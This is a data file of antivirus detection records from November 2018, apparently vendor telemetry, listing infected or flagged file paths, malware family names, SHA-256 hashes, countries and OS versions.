  Row(detection=Row(filename='407.exe', filepath='F:\\New folder\\Corel Draw 12\\407\\407.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002607-50195e5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002607-50195E5C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='E:\\DADOS\\OFFICE 2013 X64\\setup.exe', filesize=200000, name='TR/Dropper.Gen.#M300.#R241'), hash='65ac6eda8e1906ec673bcc141ef4f272af6b1c00fbb5bc8c5b9ca58168dbb93e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\SysWOW64\\rserver30\\rserver3.exe', parentsize=1164400, timestamp='2018-11-01T12:55:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0009484.exe', filepath='E:\\System Volume Information\\_restore{75C7AE52-D1AC-46D0-8315-28C9EF83A0B2}\\RP9\\A0009484.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='3468b8c254c0d7f9f44520330b971986cf99fa0d6b5b4951310bc5861bacb80c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:02:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b2b36', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b2b36', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:53:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:09:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:14:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T15:13:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unwise32.exe', filepath='C:\\Users\\X\\Desktop\\Salvataggio Dati\\CuteFTP\\UNWISE32.EXE', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='4f498247f5cf74378b9de7a5e03494c9fa1e4491c868c5ff318e82a7010eb68a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:35:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191410-bde3c4ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_530d46db\\AVSCAN-20181101-191359-BC852A6C\\AVSCAN-20181101-191410-BDE3C4AB', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='2bd310998055ce78ad91a9f366d94b970fd4b4f4c1de14e3bd57a7fc1de1bbc4', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083322-9c31c424', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07863e8e\\AVSCAN-20181101-082637-63AB43C4\\AVSCAN-20181101-083322-9C31C424', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-051135-6d505c8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cc6d38c3\\AVSCAN-20181102-051116-6AF116A8\\AVSCAN-20181102-051135-6D505C8D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:41:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbaproject.bin', filepath='word/vbaProject.bin', filesize=256000, name='HEUR/Macro.Downloader.PTA.Gen.#M5.#R140092'), hash='0e1eff9632773434de9b2ad925704780d4ebc43ea35a0752dfa99a45962aa812', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-01T15:52:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172707-d9bc892e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172610-D5726058\\AVSCAN-20181101-172707-D9BC892E', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='73ce43d2a0d2b5af4a0b19f6efb0a3a2022dee9922541ba0e7e7ca048e1023fd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bomberic 2 .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\Bomberic 2 .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='80de077b04ecb490e0fdcc0bd927cdcf6b256077e2f61f621b202ae97fba9bfd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152554-b62e9381', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152554-B62E9381', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:26:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\MSI\\TrustedInstaller.exe', filesize=320000, name='W32/Sality.Y.#M1.#R1'), hash='eb61c623e0a37a240ce044c630ec78e1aac9778579cf4ffa3b9a5a8235d4e237', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:50:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191054-2c3a20a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191054-2C3A20A5', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\labjh45l5ul\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ebc3c31328d3e062a4cae121b7ff8441a9beefe61fefaddd01a462789bb5fcb4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wqjcxmsf.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\WqjcxmsF.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233030-fc0a940b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee40cc1e\\AVSCAN-20181101-232719-E449CBE6\\AVSCAN-20181101-233030-FC0A940B', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102414-9e836173', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_020258d0\\AVSCAN-20181101-102348-9BDBB77F\\AVSCAN-20181101-102414-9E836173', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-133729-060694cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7a1bd64e\\AVSCAN-20181101-133632-FF56D982\\AVSCAN-20181101-133729-060694CB', filesize=3072000, name='TR/VBCrypt.gwtfm.#M1.#R1'), hash='8ae0ac96a2953b547b712807daa8a8d2b66bf59936f3060f93e9f7154d03f8bc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gommista.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\MECCANICA\\GOMMISTA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194240-2ef8273d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194240-2EF8273D', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212059-d552e66b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212059-D552E66B', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tatuaggio e piercing.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SERVIZI ALLA PERSONA\\OPERATORE TATUAGGI E PIERCING\\tatuaggio e piercing.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gvfypehy.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\gVFYPeHY.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:25:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ylamirxs.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\yLaMIRxs.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125521-64dfe15e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91192a31\\AVSCAN-20181101-125414-5E6EECAD\\AVSCAN-20181101-125521-64DFE15E', filesize=244000, name='TR/BProtector.nes.4.#M1.#R1'), hash='bb1e635aa88a6906473713bd49368553f49c21e885c1586742542b3fee4b405c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:55:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094117-da40b786', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094117-DA40B786', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='carta intestata faldoni.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CARTA INTESTATA FALDONI\\CARTA INTESTATA FALDONI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213430-4b1c2624', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213430-4B1C2624', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212312-e8970402', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212312-E8970402', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150304-af98ec7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150304-AF98EC7B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-224904-e1113962', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200545-360213F6\\AVSCAN-20181104-224904-E1113962', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150842-540cb882', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-150725-4B91DC60\\AVSCAN-20181104-150842-540CB882', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174729-63498bcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5bb5a5ae\\AVSCAN-20181104-174417-4ABC2321\\AVSCAN-20181104-174729-63498BCD', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:22:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175819-d51207df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3379a90\\AVSCAN-20181104-175523-B8794002\\AVSCAN-20181104-175819-D51207DF', filesize=256000, name='HEUR/AGEN.1006141.#M1.#R1'), hash='7d75d6ed93694d17ce865f13cda5a6846929eeb8f8eb072b2a90e68666acd887', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:51:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130547-fe82cccd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130547-FE82CCCD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:05:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T10:00:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ranviewer.exe', filepath='C:\\Users\\X\\Desktop\\Ran FIle\\cyz reborn\\SRC\\_bin\\release\\RanViewer.exe', filesize=2560000, name='HEUR/AGEN.1005627.#M1.#R1'), hash='0d85b5b7fe258801e30d8afa28ec32090e6a0dc651968fd32092242021820ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T12:42:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-113952-bda57ff6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e44b663\\AVSCAN-20181104-113820-B1F869CB\\AVSCAN-20181104-113952-BDA57FF6', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='8fc53fa6fb56e6d4ccf13d90e6f0a3ad46947261949036a0b08d4508f67d95a1', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:39:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161802-d55836be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161802-D55836BE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:18:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225619-d1edc6ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-225619-D1EDC6BA', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:56:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200008-afb5202d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60307d59\\AVSCAN-20181104-195731-99D479CF\\AVSCAN-20181104-200008-AFB5202D', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:00:06Z'), dt=datetime.date(2018, 11, 4)),
